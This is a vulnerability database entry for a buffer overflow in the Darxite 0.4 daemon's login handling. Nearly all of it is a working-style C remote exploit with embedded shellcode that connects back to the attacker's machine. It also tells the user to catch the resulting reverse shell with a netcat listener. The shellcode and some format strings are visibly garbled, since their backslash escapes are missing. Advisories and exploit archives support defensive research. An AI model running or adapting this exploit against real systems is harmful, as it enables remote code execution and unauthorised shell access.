https://www.exploit-db.com/exploits/20159
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200011-012

Darxite0.4及其早期版本存在缓冲区溢出漏洞。远程攻击者借助超长用户名或者密码执行任意命令。

source: http://www.securityfocus.com/bid/1598/info

Darxite 0.4 does not do proper bounds checking on user-supplied data during the login process, relying on sprintf() to deliver the data into a 256 character buffer. Therefore, it is possible for an attacker to supply arbitrary code for execution at the privilege level of the Darxite user.


/*
   Darxite Daemon v0.4 password authentication overflow
   ----------------------------------------------------

   I tried to use some easy functions for string creation, and they seem to
   work pretty quick (no more hours of frustration writing for loops :).

   As always I used my own shellcode, you should do a "nc -l -p 27002" on the
   machine you fill in as "your IP" and execute this - if it works you'll have
   a shell in the netcat session.


   -- Scrippie/[email protected]
*/

/* Synnergy.net 2000 (c) */

#include <stdio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <string.h>

#define DARX_BUF        1024
#define NUM_NOPS        1000

int xconnect(unsigned long, unsigned int);
void readBanner(int socket);
char *strcreat(char *, char *, int);
char *stralign(char *, int);
char *longToChar(unsigned long);

char hellcode[]=
        "xebx7ax5ex31xc0x31xdbx31xd2xb0x66xb3x01x8dx4e"
        "x1cxb2x01x89x56x20xb2x06x89x56x24xb2x02x89x56"
        "x1cxcdx80x89x46x18x89x16x66xc7x46x02x69x7ax89"
        "x46x1cx8dx06x89x46x20x80xc2x0ex89x56x24x31xc0"
        "x04x66x80xc3x02x8dx4ex1cxcdx80x31xc0x04x3fx89"
        "xc2x8bx5ex18x31xc9xcdx80x89xd0x41xcdx80x89xd0"
        "x41xcdx80x31xc0x8dx7ex0fx80xc1x07xf3xaax04x0b"
        "x8dx5ex08x89x5ex10x8dx4ex10x31xd2xcdx80x31xc0"
        "xfexc0xcdx80xe8x81xffxffxffx41x41x42x42xBBxBB"
        "xBBxBBx2fx62x69x6ex2fx73x68";

int main(int argc, char **argv)
{
   int sd;
   unsigned int align=0;
   unsigned long sip, retaddy=0xbffff928;
   char *iploc, *evilstring;

   if(argc < 4) {
      printf("Use as: %s <target IP> <target port> <your ip> [ret addy]
[align]
         n", argv[0]);
      exit(0);
   }

   if((sip = inet_addr(argv[3])) == -1) {
      perror("inet_addr()");
      exit(-1);
   }

   if(argc > 4) retaddy = strtoul(argv[4], NULL, 16);
   if(argc > 5) align = atoi(argv[5]);

   printf("Using return address: 0x%lxn", retaddy);
   printf("Using alignment: %dn", align);

   /* Locate the IP position in the shellcode */
   iploc=(char *)strchr(hellcode, 0xBB);
   memcpy((void *) iploc, (void *) &sip, 4);

   /* Generate the overflow string */

   evilstring = strcreat(NULL, "A", align);
      /* We memory leak 5 bytes here, don't make a service out of this :) */
   evilstring = strcreat(evilstring, longToChar(retaddy), (DARX_BUF+8)>>2);
   evilstring = strcreat(evilstring, "x90", NUM_NOPS);
   evilstring = strcreat(evilstring, hellcode, 1);

   sd = xconnect(inet_addr(argv[1]), atoi(argv[2]));

   printf("Connected... Now sending overflow...n");

   send(sd, evilstring, strlen(evilstring)+1, 0);

   free(evilstring);
   return(0);
}

/*
   Returns the socket descriptor to "ip" on "port"
*/

int xconnect(unsigned long ip, unsigned int port)
{
   struct sockaddr_in sa;       /* Sockaddr */
   int sd;                      /* Socket Descriptor */

   if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
      perror("socket()");
      exit(-1);
   }

   memset(&sa, 0x00, sizeof(struct sockaddr_in));
   sa.sin_port=htons(port);
   sa.sin_addr.s_addr=ip;

   if(connect(sd, &sa, sizeof(struct sockaddr_in)) == -1) {
      perror("connect()");
      exit(-1);
   }

   return(sd);
}

/*
   Yummy yummy function for easy string creation
*/

char *strcreat(char *dest, char *pattern, int repeat)
{
   char *ret;
   size_t plen, dlen=0;
   int i;

   if(dest) dlen = strlen(dest);
   plen = strlen(pattern);

   ret = (char *)realloc(dest, dlen+repeat*plen+1);

   for(i=0;i<repeat;i++) {
      strcat(ret, pattern);
   }
   return(ret);
}

/*
   Converts a long to an array containing this long
*/

char *longToChar(unsigned long blaat)
{
   unsigned int i;
   char *ret;

   ret = (char *)malloc(sizeof(long)+1);

   for(i=0;i<sizeof(long);i++) {
      ret[i] = (blaat >> (i<<3)) & 0xff;
   }
   ret[sizeof(long)] = 0x00;

   return(ret);
}

来源:BID
名称:1598
链接:http://www.securityfocus.com/bid/1598
来源:BUGTRAQ
名称:20000821Darxitedaemonremoteexploit/DoSproblem
链接:http://archives.neohapsis.com/archives/bugtraq/2000-08/0256.html
来源:XF
名称:darxite-login-bo
链接:http://xforce.iss.net/static/5134.php